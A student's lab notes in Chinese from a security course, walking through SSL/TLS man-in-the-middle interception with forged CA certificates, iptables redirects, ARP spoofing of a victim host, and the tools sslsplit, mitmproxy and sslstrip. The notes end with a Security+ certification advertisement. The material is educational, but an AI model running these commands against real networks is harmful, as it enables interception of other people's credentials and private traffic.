【安全牛學習筆記】SSL、TLS中間人攻擊
┃SSL中間人攻擊 ┃
┃攻擊者位於客戶端和服務器通信鏈路中┃
┃ ARP ┃
┃ DHCP ┃
┃ 修改網關 ┃
┃ 修改DNS ┃
┃ 修改HOSTS ┃
┃ ICMP、STP、OSPF ┃
┃加密流量 ┃
╋━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL中間人攻擊 ┃
┃攻擊的前提 ┃
┃ 客戶端已經信任偽造證書頒發機構 ┃
┃ 攻擊者控制了核發證書頒發機構 ┃
┃ 客戶端程序禁止了顯示證書錯誤告警信息 ┃
┃ 攻擊者已經控制客戶端,並強制其信任偽造證書 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL/TLS中間人攻擊 ┃
┃SSLsplit ┃
┃ 透明SSL/TLS中間人攻擊工具 ┃
┃ 對客戶端偽裝服務器,對服務器偽裝成普通客戶端 ┃
┃ 偽裝服務器需要偽造證書 ┃
┃ 支持SSL/TLS加密的SMTP、POP3、FTP等通信中間人攻擊 ┃
┃利用openssl生成證書私鑰
┃ openssl genrsa -out ca.key 2048 ┃
┃利用私鑰簽名生成證書 ┃
┃ openssl req -new -x509 -days 1096 -key ca.key -out ca.crt ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@R:~# openssl genrsa -out ca.key 2048
root@R:~# cat ca.key
root@R:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
you are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about en enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some field there will be a default value.
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Hangzhou
Locality Name (eg, city) []:zhejiang
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Alibaba
Organization Unit Name (eg, section) []:ALI
Common Name (e.g. server FQDN or YOUR name) []:ALBABA
Email Address []:[email protected]
root@R:~# ls
ca.crt Desktop Downloads Pictures Templates
ca.key Documents Music Public Videos
root@R:~# cat ca.crt
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL/TLS中間人攻擊 ┃
┃啟動路由 ┃
┃ sysctl -w net.ipv4.ip_forward=1 ┃
┃Iptables端口轉發規則 ┃
┃ iptables -t nat -F ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS ┃
┃ iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S ┃
┃ iptables -t nat -L ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@R:~# sysctl -w net.ipv4.ip_forward=1 ───────┐
│
root@R:~# cat /proc/sys/net/ipv4/ip_forward ├→ 效果一樣
│
root@R:~# echo 1 > /proc/sys/net/ipv4/ip_forward────┘
root@R:~# iptables -L
Chain INPUT (policy ACCEPT)
target port opt source destination
chain FORWARD (policy ACCEPT)
target port opt source destination
chain OUTPUT (policy ACCEPT)
target port opt source destination
root@R:~# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target port opt source destination
chain INPUT (policy ACCEPT)
target port opt source destination
chain OUTPUT (policy ACCEPT)
target port opt source destination
chain POSTROUTING (policy ACCEPT)
target port opt source destination
root@R:~# iptables -t nat -F //清空所有規則
root@R:~# netstat -pantu | grep :80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.117:55744 106.10.106.140:80 TIME_WAIT -
root@R:~# openvas-stop
Stooping OpenVas Services
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
root@R:~# iptables -t nat -L
Chain RTEROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080
REDIRECT tcp -- anywhere anywhere tcp dpt:https redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:submission redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:urd redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:imaps redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:pop3s redir ports 8443
Chain INPUT (policy ACCEPT)
arget prot opt source destination
chain OUTPUT (policy ACCEPT)
target port opt source destination
chain POSTROUTING (policy ACCEPT)
target port opt source destination
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL/TLS中間人攻擊
┃Arp欺騙 ┃
┃ arpspoof -i eth0 -t 1.1.1.2 -r 1.1.1.1 ┃
┃啟動SSLsplit ┃
┃ mkdir -p test/logdir ┃
┃ sslsplit -D -l connect.log -j /root/test -S logdir/ -K ca.key -c ca.crt ssl 0.0.0.0 ┃
┃ 8443 tcp 0.0.0.0 8080 ┃
┃被害者訪問taobao、baidu、mail.163.com ┃
┃查看日誌和瀏覽器證書及證書報錯信息 ┃
┃安裝服務器跟幀數之後再次訪問 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
192.168.1.1 14-75-90-21-4f-56
root@R:~# arpspoof -i eth0 -t 192.168.1.118 -r 192.168.1.1
root@R:~# sslsplit -D -l connect.log -j /root/test -S logdir/ -K ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
root@R:~# mkdir -p test/logdir
root@R:~# ls
ca.crt Desktop Downloads pictures Templates Videos
ca.key Documents Music Public test
root@R:~# cd test
root@R:~/test# ls
logdir
root@R:~/test# cd
root@R:~# cd test
root@R:~/test# cd logdir/
root@R:~/test/logdir# ls
root@R:~/test/logdir# grep 123123 *
root@R:~/test/logdir# grep baidu *
root@R:~/test/logdir# cd
root@R:~# cp ca.crt /media/sf_D_DRIVE/
root@R:~# cd test/logdir/
root@R:~/test/logdir# grep 333333 *
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL/TLS中間人攻擊 ┃
┃iptables端口轉發規則 ┃
┃ iptables -t nat -F ┃
┃ iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to- port 8080 ┃
┃ iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to- port 8080 ┃
┃Mitmproxy ┃
┃ mitmproxy -T --host -w mitmproxy.log ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@R:~# iptables -t nat -L
Chain RTEROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080
REDIRECT tcp -- anywhere anywhere tcp dpt:https redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:submission redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:urd redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:imaps redir ports 8443
REDIRECT tcp -- anywhere anywhere tcp dpt:pop3s redir ports 8443
Chain INPUT (policy ACCEPT)
arget prot opt source destination
chain OUTPUT (policy ACCEPT)
target port opt source destination
chain POSTROUTING (policy ACCEPT)
target port opt source destination
root@R:~# iptables -t nat -F
root@R:~# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to- port 8080
root@R:~# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to- port 8080
root@R:~# mitmproxy -T --host -w mitmproxy.log
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃SSL/TLS中間人攻擊 ┃
┃SSLstrip ┃
┃ 與前兩種工具不同,將客戶端到中間人之間的流量變為明文 ┃
┃ sslstrip -l 8080 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@R:~# sslstrip -l 8080
root@R:~# iptables -t nat -L
Chain RTEROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8080
REDIRECT tcp -- anywhere anywhere tcp dpt:https redir ports 8080
Chain INPUT (policy ACCEPT)
arget prot opt source destination
chain OUTPUT (policy ACCEPT)
target port opt source destination
chain POSTROUTING (policy ACCEPT)
target port opt source destination
該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂
Security+認證為什麽是互聯網+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。
目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試方便、費用適中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。
【安全牛學習筆記】SSL、TLS中間人攻擊